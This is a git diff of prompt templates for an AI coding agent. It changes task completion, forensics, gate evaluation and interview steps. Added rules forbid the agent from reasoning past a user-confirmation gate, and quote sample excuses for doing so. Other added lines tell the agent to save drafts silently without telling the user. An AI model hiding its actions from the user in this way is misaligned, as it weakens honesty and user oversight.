+10. Run the slice-level verification checks defined in the slice plan's Verification section. Track which pass. On the final task of the slice, all must pass before marking done. On intermediate tasks, partial passes are expected — note which ones pass in the summary.
+11. After the verification gate runs (you'll see gate results in stderr/notify output), populate the `## Verification Evidence` table in your task summary with the check results. Use the `formatEvidenceTable` format: one row per check with command, exit code, verdict (✅ pass / ❌ fail), and duration. If no verification commands were discovered, note that in the section.
+12. If the task touches UI, browser flows, DOM behavior, or user-visible web state:
    - exercise the real flow in the browser
    - prefer `browser_batch` when the next few actions are obvious and sequential
    - prefer `browser_assert` for explicit pass/fail verification of the intended outcome
    - use `browser_diff` when an action's effect is ambiguous
    - use console/network/dialog diagnostics when validating async, stateful, or failure-prone UI
    - record verification in terms of explicit checks passed/failed, not only prose interpretation
-10. If the task plan includes an Observability Impact section, verify those signals directly. Skip this step if the task plan omits the section.
-11. **If execution is running long or verification fails:**
+13. If the task plan includes an Observability Impact section, verify those signals directly. Skip this step if the task plan omits the section.
+14. **If execution is running long or verification fails:**
 
     **Context budget:** You have approximately **{{verificationBudget}}** reserved for verification context. If you've used most of your context and haven't finished all steps, stop implementing and prioritize writing the task summary with clear notes on what's done and what remains. A partial summary that enables clean resumption is more valuable than one more half-finished step with no documentation. Never sacrifice summary quality for one more implementation step.
 
@@ -60,16 +65,18 @@ Then:
     - Distinguish "I know" from "I assume." Observable facts (the error says X) are strong evidence. Assumptions (this library should work this way) need verification.
     - Know when to stop. If you've tried 3+ fixes without progress, your mental model is probably wrong. Stop. List what you know for certain. List what you've ruled out. Form fresh hypotheses from there.
     - Don't fix symptoms. Understand *why* something fails before changing code. A test that passes after a change you don't understand is luck, not a fix.
-11. **Blocker discovery:** If execution reveals that the remaining slice plan is fundamentally invalid — not just a bug or minor deviation, but a plan-invalidating finding like a wrong API, missing capability, or architectural mismatch — set `blocker_discovered: true` in the task summary frontmatter and describe the blocker clearly in the summary narrative. Do NOT set `blocker_discovered: true` for ordinary debugging, minor deviations, or issues that can be fixed within the current task or the remaining plan. This flag triggers an automatic replan of the slice.
-12. If you made an architectural, pattern, library, or observability decision during this task that downstream work should know about, append it to `.gsd/DECISIONS.md` (read the template at `~/.gsd/agent/extensions/gsd/templates/decisions.md` if the file doesn't exist yet). Not every task produces decisions — only append when a meaningful choice was made.
-13. If you discover a non-obvious rule, recurring gotcha, or useful pattern during execution, append it to `.gsd/KNOWLEDGE.md`. Only add entries that would save future agents from repeating your investigation. Don't add obvious things.
-14. Read the template at `~/.gsd/agent/extensions/gsd/templates/task-summary.md`
-15. Write `{{taskSummaryPath}}`
-16. Mark {{taskId}} done in `{{planPath}}` (change `[ ]` to `[x]`)
-17. Do not run git commands — the system reads your task summary after completion and creates a meaningful commit from it (type inferred from title, message from your one-liner, key files from frontmatter). Write a clear, specific one-liner in the summary — it becomes the commit message.
+15. **Blocker discovery:** If execution reveals that the remaining slice plan is fundamentally invalid — not just a bug or minor deviation, but a plan-invalidating finding like a wrong API, missing capability, or architectural mismatch — set `blocker_discovered: true` in the task summary frontmatter and describe the blocker clearly in the summary narrative. Do NOT set `blocker_discovered: true` for ordinary debugging, minor deviations, or issues that can be fixed within the current task or the remaining plan. This flag triggers an automatic replan of the slice.
+16. If you made an architectural, pattern, library, or observability decision during this task that downstream work should know about, append it to `.gsd/DECISIONS.md` (read the template at `~/.gsd/agent/extensions/gsd/templates/decisions.md` if the file doesn't exist yet). Not every task produces decisions — only append when a meaningful choice was made.
+17. If you discover a non-obvious rule, recurring gotcha, or useful pattern during execution, append it to `.gsd/KNOWLEDGE.md`. Only add entries that would save future agents from repeating your investigation. Don't add obvious things.
+18. Read the template at `~/.gsd/agent/extensions/gsd/templates/task-summary.md`
+19. Use that template to prepare the completion content you will pass to `gsd_complete_task` using the camelCase fields `milestoneId`, `sliceId`, `taskId`, `oneLiner`, `narrative`, `verification`, and `verificationEvidence`. Do **not** manually write `{{taskSummaryPath}}` — the DB-backed tool is the canonical write path and renders the summary file for you.
+20. Call `gsd_complete_task` with milestoneId, sliceId, taskId, and the completion fields derived from the template. This is your final required step — do NOT manually edit PLAN.md checkboxes. The tool marks the task complete, updates the DB, renders `{{taskSummaryPath}}`, and updates PLAN.md automatically.
+21. Do not run git commands — the system reads your task summary after completion and creates a meaningful commit from it (type inferred from title, message from your one-liner, key files from frontmatter). Write a clear, specific one-liner in the summary — it becomes the commit message.
 
 All work stays in your working directory: `{{workingDirectory}}`.
 
-**You MUST mark {{taskId}} as `[x]` in `{{planPath}}` AND write `{{taskSummaryPath}}` before finishing.**
+**Autonomous execution:** Do not call `ask_user_questions` or `secure_env_collect`. You are running in auto-mode — there is no human available to answer questions. Make reasonable assumptions and document them in the task summary. If a decision genuinely requires human input, note it in the summary and proceed with the best available option.
+
+**You MUST call `gsd_complete_task` before finishing. Do not manually write `{{taskSummaryPath}}`.**
 
 When done, say: "Task {{taskId}} complete."
diff --git a/src/resources/extensions/gsd/prompts/forensics.md b/src/resources/extensions/gsd/prompts/forensics.md
index 71225fcf8..ffcd01151 100644
--- a/src/resources/extensions/gsd/prompts/forensics.md
+++ b/src/resources/extensions/gsd/prompts/forensics.md
@@ -16,7 +16,7 @@ GSD extension source code is at: `{{gsdSourceDir}}`
 
 | Domain | Files |
 |--------|-------|
-| **Auto-mode engine** | `auto.ts` `auto-loop.ts` `auto-dispatch.ts` `auto-start.ts` `auto-supervisor.ts` `auto-timers.ts` `auto-timeout-recovery.ts` `auto-unit-closeout.ts` `auto-post-unit.ts` `auto-verification.ts` `auto-recovery.ts` `auto-worktree.ts` `auto-worktree-sync.ts` `auto-model-selection.ts` `auto-budget.ts` `dispatch-guard.ts` |
+| **Auto-mode engine** | `auto.ts` `auto-loop.ts` `auto-dispatch.ts` `auto-start.ts` `auto-supervisor.ts` `auto-timers.ts` `auto-timeout-recovery.ts` `auto-unit-closeout.ts` `auto-post-unit.ts` `auto-verification.ts` `auto-recovery.ts` `auto-worktree.ts` `auto-model-selection.ts` `auto-budget.ts` `dispatch-guard.ts` |
 | **State & persistence** | `state.ts` `types.ts` `files.ts` `paths.ts` `json-persistence.ts` `atomic-write.ts` |
 | **Forensics & recovery** | `forensics.ts` `session-forensics.ts` `crash-recovery.ts` `session-lock.ts` |
 | **Metrics & telemetry** | `metrics.ts` `skill-telemetry.ts` `token-counter.ts` |
@@ -36,6 +36,8 @@ GSD extension source code is at: `{{gsdSourceDir}}`
 ├── doctor-history.jsonl         — doctor check history
 ├── activity/                    — session activity logs (JSONL per unit)
 │   └── {seq}-{unitType}-{unitId}.jsonl
+├── journal/                     — structured event journal (JSONL per day)
+│   └── YYYY-MM-DD.jsonl
 ├── runtime/
 │   ├── paused-session.json      — serialized session when auto pauses
 │   └── headless-context.md      — headless resume context
@@ -44,7 +46,7 @@ GSD extension source code is at: `{{gsdSourceDir}}`
 ├── milestones/{ID}/             — milestone artifacts
 │   ├── {ID}-ROADMAP.md, {ID}-RESEARCH.md, {ID}-CONTEXT.md, {ID}-SUMMARY.md
 │   └── slices/{SID}/            — slice artifacts
-│       ├── {SID}-PLAN.md, {SID}-RESEARCH.md, {SID}-UAT-RESULT.md, {SID}-SUMMARY.md
+│       ├── {SID}-PLAN.md, {SID}-RESEARCH.md, {SID}-UAT.md, {SID}-SUMMARY.md
 │       └── tasks/{TID}-PLAN.md, {TID}-SUMMARY.md
 └── worktrees/{milestoneId}/     — per-milestone worktree with replicated .gsd/
 ```
@@ -60,6 +62,32 @@ GSD extension source code is at: `{{gsdSourceDir}}`
 - `usage` field on assistant messages: `input`, `output`, `cacheRead`, `cacheWrite`, `totalTokens`, `cost`
 - **To trace a failure**: find the last activity log, search for `isError: true` tool results, then read the agent's reasoning text preceding that error
 
+### Journal Format (`.gsd/journal/`)
+
+The journal is a structured event log for auto-mode iterations. Each daily file contains JSONL entries:
+
+```
+{ ts: "ISO-8601", flowId: "UUID", seq: 0, eventType: "iteration-start", rule?: "rule-name", causedBy?: { flowId, seq }, data?: { unitId, status, ... } }
+```
+
+**Key event types:**
+- `iteration-start` / `iteration-end` — marks loop iteration boundaries
+- `dispatch-match` / `dispatch-stop` — what the auto-mode decided to do (or not do)
+- `unit-start` / `unit-end` — lifecycle of individual work units
+- `terminal` — auto-mode reached a terminal state (all done, budget exceeded, etc.)
+- `guard-block` — dispatch was blocked by a guard condition (e.g. needs user input)
+- `stuck-detected` — the loop detected it was stuck (same unit repeatedly dispatched)
+- `milestone-transition` — a milestone was promoted or completed
+- `worktree-enter` / `worktree-create-failed` / `worktree-merge-start` / `worktree-merge-failed` — worktree operations
+
+**Key concepts:**
+- **flowId**: UUID grouping all events in one iteration. Use to reconstruct what happened in a single loop pass.
+- **causedBy**: Cross-reference to a prior event (same or different flow). Enables causal chain tracing.
+- **seq**: Monotonically increasing within a flow. Reconstruct event order within an iteration.
+
+**To trace a stuck loop**: filter for `stuck-detected` events, then follow `flowId` to see the surrounding dispatch and unit events.
+**To trace a guard block**: filter for `guard-block` events, check `data.reason` for why dispatch was blocked.
+
 ### Crash Lock Format (`auto.lock`)
 
 JSON with fields: `pid`, `startedAt`, `unitType`, `unitId`, `unitStartedAt`, `completedUnits`, `sessionFile`
@@ -74,24 +102,32 @@ A stale lock (PID is dead) means the previous auto-mode session crashed mid-unit
 
 A unit dispatched more than once (`type/id` appears multiple times) indicates a stuck loop — the unit completed but artifact verification failed.
 
+{{dedupSection}}
+
 ## Investigation Protocol
 
 1. **Start with the pre-parsed forensic report** above. The anomaly section contains automated findings — treat these as leads, not conclusions.
 
-2. **Form hypotheses** about which module and code path is responsible. Use the source map to identify candidate files.
+2. **Check the journal timeline** if present. The journal events show the auto-mode's decision sequence (dispatches, guards, stuck detection, worktree operations). Use flow IDs to group related events and trace causal chains.
 
-3. **Read the actual GSD source code** at `{{gsdSourceDir}}` to confirm or deny each hypothesis. Do not guess what code does — read it.
+3. **Cross-reference activity logs and journal**. Activity logs show *what the LLM did* (tool calls, reasoning, errors). Journal events show *what auto-mode decided* (dispatch rules, iteration boundaries, state transitions). Together they reveal the full picture.
 
-4. **Trace the code path** from the entry point (usually `auto-loop.ts` dispatch or `auto-dispatch.ts`) through to the failure point. Follow function calls across files.
+4. **Form hypotheses** about which module and code path is responsible. Use the source map to identify candidate files.
 
-5. **Identify the specific file and line** where the bug lives. Determine what kind of defect it is:
+5. **Read the actual GSD source code** at `{{gsdSourceDir}}` to confirm or deny each hypothesis. Do not guess what code does — read it.
+
+   **DB inspection:** If you need to check DB state as part of investigation, use `gsd_milestone_status` — never run `sqlite3 .gsd/gsd.db` or `node -e require('better-sqlite3')` directly. The engine holds a WAL write lock; direct access will either fail or return stale data.
+
+6. **Trace the code path** from the entry point (usually `auto-loop.ts` dispatch or `auto-dispatch.ts`) through to the failure point. Follow function calls across files.
+
+7. **Identify the specific file and line** where the bug lives. Determine what kind of defect it is:
    - Missing edge case / unhandled condition
    - Wrong boolean logic or comparison
    - Race condition or ordering issue
    - State corruption (e.g. completed-units.json out of sync with artifacts)
    - Timeout / recovery logic not triggering correctly
 
-6. **Clarify if needed.** Use ask_user_questions (max 2 questions) only if the report is genuinely insufficient. Do not ask questions you can answer from the data or source code.
+8. **Clarify if needed.** Use ask_user_questions (max 2 questions) only if the report is genuinely insufficient. Do not ask questions you can answer from the data or source code.
 
 ## Output
 
@@ -103,9 +139,15 @@ Explain your findings:
 
 Then **offer GitHub issue creation**: "Would you like me to create a GitHub issue for this on gsd-build/gsd-2?"
 
-If yes, create using `gh issue create` with this format:
+**CRITICAL: The `github_issues` tool ONLY targets the current user's repository — it has no `repo` parameter. You MUST use `gh issue create --repo gsd-build/gsd-2` via the `bash` tool to file on the correct repo. Do NOT use the `github_issues` tool for this.**
 
-```
+If yes, create using the `bash` tool:
+
+```bash
+# Step 1: Write issue body to a temp file to avoid escaping/truncation issues.
+# Using --body-file bypasses shell quoting entirely — backticks, quotes, and
+# content containing "EOF" all render correctly. (#2465)
+cat > /tmp/gsd-forensic-issue.md << 'GSD_ISSUE_BODY'
 ## Problem
 [1-2 sentence summary]
 
@@ -128,10 +170,20 @@ If yes, create using `gh issue create` with this format:
 
 ---
 *Auto-generated by `/gsd forensics`*
-```
+GSD_ISSUE_BODY
 
-**Repository:** gsd-build/gsd-2
-**Labels:** bug, auto-generated
+ISSUE_URL=$(gh issue create --repo gsd-build/gsd-2 \
+  --title "..." \
+  --label "auto-generated" \
+  --body-file /tmp/gsd-forensic-issue.md)
+rm -f /tmp/gsd-forensic-issue.md
+
+# Step 2: Set issue type via GraphQL (gh issue create has no --type flag)
+ISSUE_NUM=$(echo "$ISSUE_URL" | grep -oE '[0-9]+$')
+ISSUE_ID=$(gh api graphql -f query='{ repository(owner:"gsd-build",name:"gsd-2") { issue(number:'"$ISSUE_NUM"') { id } } }' --jq '.data.repository.issue.id')
+TYPE_ID=$(gh api graphql -f query='{ repository(owner:"gsd-build",name:"gsd-2") { issueTypes(first:20) { nodes { id name } } } }' --jq '.data.repository.issueTypes.nodes[] | select(.name=="Bug") | .id')
+gh api graphql -f query='mutation { updateIssue(input:{id:"'"$ISSUE_ID"'",issueTypeId:"'"$TYPE_ID"'"}) { issue { number } } }'
+```
 
 ### Redaction Rules (CRITICAL)
 
diff --git a/src/resources/extensions/gsd/prompts/gate-evaluate.md b/src/resources/extensions/gsd/prompts/gate-evaluate.md
new file mode 100644
index 000000000..3ee974097
--- /dev/null
+++ b/src/resources/extensions/gsd/prompts/gate-evaluate.md
@@ -0,0 +1,32 @@
+# Quality Gate Evaluation — Parallel Dispatch
+
+**Working directory:** `{{workingDirectory}}`
+**Milestone:** {{milestoneId}} — {{milestoneTitle}}
+**Slice:** {{sliceId}} — {{sliceTitle}}
+
+## Mission
+
+You are evaluating **quality gates in parallel** for this slice. Each gate is an independent question that must be answered before task execution begins. Use the `subagent` tool to dispatch all gate evaluations simultaneously.
+
+## Slice Plan Context
+
+{{slicePlanContent}}
+
+## Gates to Evaluate
+
+{{gateCount}} gates require evaluation:
+
+{{gateList}}
+
+## Execution Protocol
+
+1. **Dispatch all gates** using `subagent` in parallel mode. Each subagent prompt is provided below.
+2. **Wait for all subagents** to complete.
+3. **Verify each gate wrote its result** by checking that `gsd_save_gate_result` was called for each gate ID.
+4. **Report the batch outcome** — which gates passed, which flagged concerns, and which were omitted as not applicable.
+
+Gate agents may return `verdict: "omitted"` if the gate question is not applicable to this slice (e.g., no auth surface for Q3, no existing requirements touched for Q4). This is expected for simple slices.
+
+## Subagent Prompts
+
+{{subagentPrompts}}
diff --git a/src/resources/extensions/gsd/prompts/guided-complete-slice.md b/src/resources/extensions/gsd/prompts/guided-complete-slice.md
index b363b8be7..ec692a3a7 100644
--- a/src/resources/extensions/gsd/prompts/guided-complete-slice.md
+++ b/src/resources/extensions/gsd/prompts/guided-complete-slice.md
@@ -1,3 +1,3 @@
-Complete slice {{sliceId}} ("{{sliceTitle}}") of milestone {{milestoneId}}. Your working directory is `{{workingDirectory}}` — all file operations must use this path. All tasks are done. Your slice summary is the primary record of what was built — downstream agents (reassess-roadmap, future slice researchers) read it to understand what this slice delivered and what to watch out for. Use the **Slice Summary** and **UAT** output templates below. {{skillActivation}} Write `{{sliceId}}-SUMMARY.md` (compress task summaries), write `{{sliceId}}-UAT.md`, and fill the `UAT Type` plus `Not Proven By This UAT` sections explicitly so the artifact states what class of acceptance it covers and what still remains unproven. Review task summaries for `key_decisions` and ensure any significant ones are in `.gsd/DECISIONS.md`. Mark the slice checkbox done in the roadmap, update milestone summary, Do not commit or merge manually — the system handles this after the unit completes.
+Complete slice {{sliceId}} ("{{sliceTitle}}") of milestone {{milestoneId}}. Your working directory is `{{workingDirectory}}` — all file operations must use this path. All tasks are done. Your slice summary is the primary record of what was built — downstream agents (reassess-roadmap, future slice researchers) read it to understand what this slice delivered and what to watch out for. Use the **Slice Summary** and **UAT** output templates below to understand the expected structure. {{skillActivation}} Call `gsd_slice_complete` to record completion — the tool writes `{{sliceId}}-SUMMARY.md`, `{{sliceId}}-UAT.md`, and toggles the roadmap checkbox atomically. Fill the `UAT Type` plus `Not Proven By This UAT` sections explicitly in `uatContent` so the artifact states what class of acceptance it covers and what still remains unproven. Review task summaries for `key_decisions` and ensure any significant ones are in `.gsd/DECISIONS.md`. If the slice involved runtime behavior, fill the Operational Readiness section (Q8) in the summary: health signal, failure signal, recovery procedure, and monitoring gaps. Omit for simple slices. Do not commit or merge manually — the system handles this after the unit completes.
 
 {{inlinedTemplates}}
diff --git a/src/resources/extensions/gsd/prompts/guided-discuss-milestone.md b/src/resources/extensions/gsd/prompts/guided-discuss-milestone.md
index 55117dd2f..efa3cda62 100644
--- a/src/resources/extensions/gsd/prompts/guided-discuss-milestone.md
+++ b/src/resources/extensions/gsd/prompts/guided-discuss-milestone.md
@@ -8,12 +8,14 @@ Discuss milestone {{milestoneId}} ("{{milestoneTitle}}"). Identify gray areas, a
 
 ## Interview Protocol
 
+{{fastPathInstruction}}
+
 ### Before your first question round
 
 Do a lightweight targeted investigation so your questions are grounded in reality:
 - Scout the codebase (`rg`, `find`, or `scout`) to understand what already exists that this milestone touches or builds on
 - Check the roadmap context above (if present) to understand what surrounds this milestone
-- Use `resolve_library` / `get_library_docs` for unfamiliar libraries — prefer this over `web_search` for library documentation
+- Use `resolve_library` / `get_library_docs` for unfamiliar libraries — prefer this over `search-the-web` for library documentation
 - Identify the 3–5 biggest behavioural and architectural unknowns: things where the user's answer will materially change what gets built
 
 **Web search budget:** You have a limited number of web searches per turn (typically 3-5). Prefer `resolve_library` / `get_library_docs` for library documentation and `search_and_read` for one-shot topic research — they are more budget-efficient. Target 2-3 web searches in the investigation pass. Distribute remaining searches across subsequent question rounds rather than clustering them.
@@ -30,7 +32,7 @@ Ask **1–3 questions per round**. Keep each question focused on one of:
 - **The biggest technical unknowns / risks** — what could fail, what hasn't been proven
 - **What external systems/services this touches** — APIs, databases, third-party services
 
-**If `{{structuredQuestionsAvailable}}` is `true`:** use `ask_user_questions` for each round. 1–3 questions per call, each as a separate question object. Keep option labels short (3–5 words). Always include a freeform "Other / let me explain" option. When the user picks that option or writes a long freeform answer, switch to plain text follow-up for that thread before resuming structured questions.
+**If `{{structuredQuestionsAvailable}}` is `true`:** use `ask_user_questions` for each round. 1–3 questions per call, each as a separate question object. Keep option labels short (3–5 words). Always include a freeform "Other / let me explain" option. When the user picks that option or writes a long freeform answer, switch to plain text follow-up for that thread before resuming structured questions. **IMPORTANT: Call `ask_user_questions` exactly once per turn. Never make multiple calls with the same or overlapping questions — wait for the user's response before asking the next round.**
 
 **If `{{structuredQuestionsAvailable}}` is `false`:** ask questions in plain text. Keep each round to 1–3 focused questions. Wait for answers before asking the next round.
 
@@ -40,7 +42,8 @@ After the user answers, investigate further if any answer opens a new unknown, t
 
 After each round of answers, decide whether you already have enough depth to write a strong context file.
 
-- If not, investigate any newly-opened unknowns and continue to the next round immediately. Do **not** ask a meta "ready to wrap up?" question after every round.
+- **Incremental persistence:** After every 2 question rounds, silently save a `{{milestoneId}}-CONTEXT-DRAFT.md` with your current understanding using `gsd_summary_save` with `artifact_type: "CONTEXT-DRAFT"`. This protects against session crashes losing all confirmed work. Do NOT mention this save to the user — it's invisible bookkeeping. The final context file will overwrite it.
+- If not ready, investigate any newly-opened unknowns and continue to the next round immediately. Do **not** ask a meta "ready to wrap up?" question after every round.
 - Use a single wrap-up prompt only when you genuinely believe the depth checklist is satisfied or the user signals they want to stop.
 - **If `{{structuredQuestionsAvailable}}` is `true` and you need that wrap-up prompt:** use `ask_user_questions` with options:
   - "Write the context file" *(recommended when depth is satisfied)*
@@ -89,14 +92,16 @@ Before moving to the wrap-up gate, verify you have covered:
 - header: "Depth Check"
 - question: "Did I capture the depth right?"
 - options: "Yes, you got it (Recommended)", "Not quite — let me clarify"
-- **The question ID must contain `depth_verification`** (e.g. `depth_verification_confirm`) — this enables the write-gate downstream.
+- **The question ID must contain `depth_verification` and the milestone id** (e.g. `depth_verification_{{milestoneId}}_confirm`) — this enables the write-gate downstream and keeps verification scoped to the milestone being discussed.
 
-**If `{{structuredQuestionsAvailable}}` is `false`:** ask in plain text: "Did I capture that correctly? If not, tell me what I missed." Wait for confirmation before proceeding.
+**If `{{structuredQuestionsAvailable}}` is `false`:** ask in plain text: "Did I capture that correctly? If not, tell me what I missed." Wait for explicit confirmation before proceeding. **The same non-bypassable gate applies to the plain-text path** — if the user does not respond, gives an ambiguous answer, or does not explicitly confirm, you MUST re-ask. Never rationalize past a missing confirmation.
 
 If they clarify, absorb the correction and re-verify.
 
 The depth verification is the only required confirmation gate. Do not add a second "ready to proceed?" gate after it.
 
+**CRITICAL — Non-bypassable gate:** The system mechanically blocks CONTEXT.md writes until the user selects the "(Recommended)" option (structured path) or explicitly confirms (plain-text path). If the user declines, cancels, does not respond, or the tool fails, you MUST re-ask — never rationalize past the block ("tool not responding, I'll proceed" is forbidden). The gate exists to protect the user's work; treat a block as an instruction, not an obstacle to work around.
+
 ---
 
 ## Output
@@ -105,6 +110,6 @@ Once the user confirms depth:
 
 1. Use the **Context** output template below
 2. `mkdir -p` the milestone directory if needed
-3. Write `{{milestoneId}}-CONTEXT.md` — preserve the user's exact terminology, emphasis, and framing. Do not paraphrase nuance into generic summaries. The context file is downstream agents' only window into this conversation.
+3. Call `gsd_summary_save` with `milestone_id: {{milestoneId}}`, `artifact_type: "CONTEXT"`, and the full context markdown as `content` — the tool writes the file to disk and persists to DB. Preserve the user's exact terminology, emphasis, and framing in the content. Do not paraphrase nuance into generic summaries. The context file is downstream agents' only window into this conversation.
 4. {{commitInstruction}}
 5. Say exactly: `"{{milestoneId}} context written."` — nothing else.
diff --git a/src/resources/extensions/gsd/prompts/guided-discuss-slice.md b/src/resources/extensions/gsd/prompts/guided-discuss-slice.md
index 143f8a60f..e182bc417 100644
--- a/src/resources/extensions/gsd/prompts/guided-discuss-slice.md
+++ b/src/resources/extensions/gsd/prompts/guided-discuss-slice.md
@@ -13,7 +13,7 @@ Your goal is **not** to center the discussion on tech stack trivia, naming conve
 Do a lightweight targeted investigation so your questions are grounded in reality:
 - Scout the codebase (`rg`, `find`, or `scout` for broad unfamiliar areas) to understand what already exists that this slice touches or builds on
 - Check the roadmap context above to understand what surrounds this slice — what comes before, what depends on it
-- Use `resolve_library` / `get_library_docs` for unfamiliar libraries — prefer this over `web_search` for library documentation
+- Use `resolve_library` / `get_library_docs` for unfamiliar libraries — prefer this over `search-the-web` for library documentation
 - Identify the 3–5 biggest behavioural unknowns: things where the user's answer will materially change what gets built
 
 **Web search budget:** You have a limited number of web searches per turn (typically 3-5). Prefer `resolve_library` / `get_library_docs` for library documentation and `search_and_read` for one-shot topic research — they are more budget-efficient. Target 2-3 web searches in the investigation pass. Distribute remaining searches across subsequent question rounds rather than clustering them.
@@ -22,7 +22,9 @@ Do **not** go deep — just enough that your questions reflect what's actually t
 
 ### Question rounds
 
-Ask **1–3 questions per round** using `ask_user_questions`. Keep each question focused on one of:
+**If `{{structuredQuestionsAvailable}}` is `true`:** Ask **1–3 questions per round** using `ask_user_questions`. **Call `ask_user_questions` exactly once per turn — never make multiple calls with the same or overlapping questions. Wait for the user's response before asking the next round.**
+**If `{{structuredQuestionsAvailable}}` is `false`:** Ask **1–3 questions per round** in plain text. Number them and wait for the user's response before asking the next round.
+Keep each question focused on one of:
 - **UX and user-facing behaviour** — what does the user see, click, trigger, or experience?
 - **Edge cases and failure states** — what happens when things go wrong or are in unusual states?
 - **Scope boundaries** — what is explicitly in vs out for this slice? What deferred to later?
@@ -34,21 +36,22 @@ After the user answers, investigate further if any answer opens a new unknown, t
 
 After each round of answers, decide whether you already have enough signal to write the slice context cleanly.
 
+- **Incremental persistence:** After every 2 question rounds, silently save a draft `{{sliceId}}-CONTEXT-DRAFT.md` in `{{sliceDirPath}}` using `gsd_summary_save` with `milestone_id: {{milestoneId}}`, `slice_id: {{sliceId}}`, `artifact_type: "CONTEXT-DRAFT"`. This protects against session crashes losing confirmed work. Do NOT mention this to the user. The final context file will replace it.
 - If not, investigate any new unknowns and continue to the next round immediately. Do **not** ask a meta "ready to wrap up?" question after every round.
 - Ask a single wrap-up question only when you genuinely believe the slice is well understood or the user signals they want to stop.
-- When you do ask it, use `ask_user_questions` with:
-  - "Write the context file" *(recommended when the slice is well understood)*
-  - "One more pass"
+- When you do ask it, offer two choices: "Write the context file" *(recommended when the slice is well understood)* or "One more pass". Use `ask_user_questions` if available, otherwise ask in plain text.
+
+**CRITICAL — Non-bypassable gate:** Do NOT write the context file until the user explicitly selects "Write the context file." If `ask_user_questions` fails, errors, returns no response, or the user's response does not match a provided option, you MUST re-ask — never rationalize past the block. "Tool not responding, I'll proceed," "auth issues," or "the slice seems well understood, I'll write it" are all **forbidden**. The gate exists to protect the user's work; treat a block as an instruction to wait, not an obstacle to work around.
 
 ---
 
 ## Output
 
-Once the user is ready to wrap up:
+Once the user has explicitly confirmed they are ready to write the context file:
 
 1. Use the **Slice Context** output template below
 2. `mkdir -p {{sliceDirPath}}`
-3. Write `{{contextPath}}` — use the template structure, filling in:
+3. Call `gsd_summary_save` with `milestone_id: {{milestoneId}}`, `slice_id: {{sliceId}}`, `artifact_type: "CONTEXT"`, and the context as `content` — the tool writes the file to disk and persists to DB. Use the template structure, filling in:
    - **Goal** — one sentence: what this slice delivers
    - **Why this Slice** — why now, what it unblocks
    - **Scope / In Scope** — what was confirmed in scope during the interview
diff --git a/src/resources/extensions/gsd/prompts/guided-execute-task.md b/src/resources/extensions/gsd/prompts/guided-execute-task.md
index 381c55ce1..8e0793ec9 100644
--- a/src/resources/extensions/gsd/prompts/guided-execute-task.md
+++ b/src/resources/extensions/gsd/prompts/guided-execute-task.md
@@ -1,3 +1,3 @@
-Execute the next task: {{taskId}} ("{{taskTitle}}") in slice {{sliceId}} of milestone {{milestoneId}}. Read the task plan (`{{taskId}}-PLAN.md`), load relevant summaries from prior tasks, and execute each step. Verify must-haves when done. If the task touches UI, browser flows, DOM behavior, or user-visible web state, exercise the real flow in the browser, prefer `browser_batch` for obvious sequences, prefer `browser_assert` for explicit pass/fail verification, use `browser_diff` when an action's effect is ambiguous, and use browser diagnostics when validating async or failure-prone UI. If you made an architectural, pattern, or library decision, append it to `.gsd/DECISIONS.md`. Use the **Task Summary** output template below. Write `{{taskId}}-SUMMARY.md`, mark it done, commit, and advance. {{skillActivation}} If running long and not all steps are finished, stop implementing and prioritize writing a clean partial summary over attempting one more step — a recoverable handoff is more valuable than a half-finished step with no documentation. If verification fails, debug methodically: form a hypothesis and test that specific theory before changing anything, change one variable at a time, read entire functions not just the suspect line, distinguish observable facts from assumptions, and if 3+ fixes fail without progress stop and reassess your mental model — list what you know for certain, what you've ruled out, and form fresh hypotheses. Don't fix symptoms — understand why something fails before changing code.
+Execute the next task: {{taskId}} ("{{taskTitle}}") in slice {{sliceId}} of milestone {{milestoneId}}. Read the task plan (`{{taskId}}-PLAN.md`), load relevant summaries from prior tasks, and execute each step. Verify must-haves when done. If the task touches UI, browser flows, DOM behavior, or user-visible web state, exercise the real flow in the browser, prefer `browser_batch` for obvious sequences, prefer `browser_assert` for explicit pass/fail verification, use `browser_diff` when an action's effect is ambiguous, and use browser diagnostics when validating async or failure-prone UI. If you made an architectural, pattern, or library decision, append it to `.gsd/DECISIONS.md`. Use the **Task Summary** output template below. Call `gsd_task_complete` to record completion (it writes the summary, toggles the checkbox, and persists to DB atomically). {{skillActivation}} If running long and not all steps are finished, stop implementing and prioritize writing a clean partial summary over attempting one more step — a recoverable handoff is more valuable than a half-finished step with no documentation. If verification fails, debug methodically: form a hypothesis and test that specific theory before changing anything, change one variable at a time, read entire functions not just the suspect line, distinguish observable facts from assumptions, and if 3+ fixes fail without progress stop and reassess your mental model — list what you know for certain, what you've ruled out, and form fresh hypotheses. Don't fix symptoms — understand why something fails before changing code. If the task plan includes Failure Modes, Load Profile, or Negative Tests sections, implement and verify them: handle each dependency's error/timeout/malformed paths (Q5), protect against identified 10x breakpoints (Q6), and write specified negative test cases (Q7).
 
 {{inlinedTemplates}}
diff --git a/src/resources/extensions/gsd/prompts/guided-plan-milestone.md b/src/resources/extensions/gsd/prompts/guided-plan-milestone.md
index bb8dae5ed..5616ea729 100644
--- a/src/resources/extensions/gsd/prompts/guided-plan-milestone.md
+++ b/src/resources/extensions/gsd/prompts/guided-plan-milestone.md
@@ -1,4 +1,4 @@
-Plan milestone {{milestoneId}} ("{{milestoneTitle}}"). Read `.gsd/DECISIONS.md` if it exists — respect existing decisions. Read `.gsd/REQUIREMENTS.md` if it exists and treat Active requirements as the capability contract. If `REQUIREMENTS.md` is missing, continue in legacy compatibility mode but explicitly note missing requirement coverage. Use the **Roadmap** output template below. Create `{{milestoneId}}-ROADMAP.md` in the milestone directory with slices, risk levels, dependencies, demo sentences, verification classes, milestone definition of done, requirement coverage, and a boundary map. Write success criteria as observable truths, not implementation tasks. If the milestone crosses multiple runtime boundaries, include an explicit final integration slice that proves the assembled system works end-to-end in a real environment. If planning produces structural decisions, append them to `.gsd/DECISIONS.md`. {{skillActivation}}
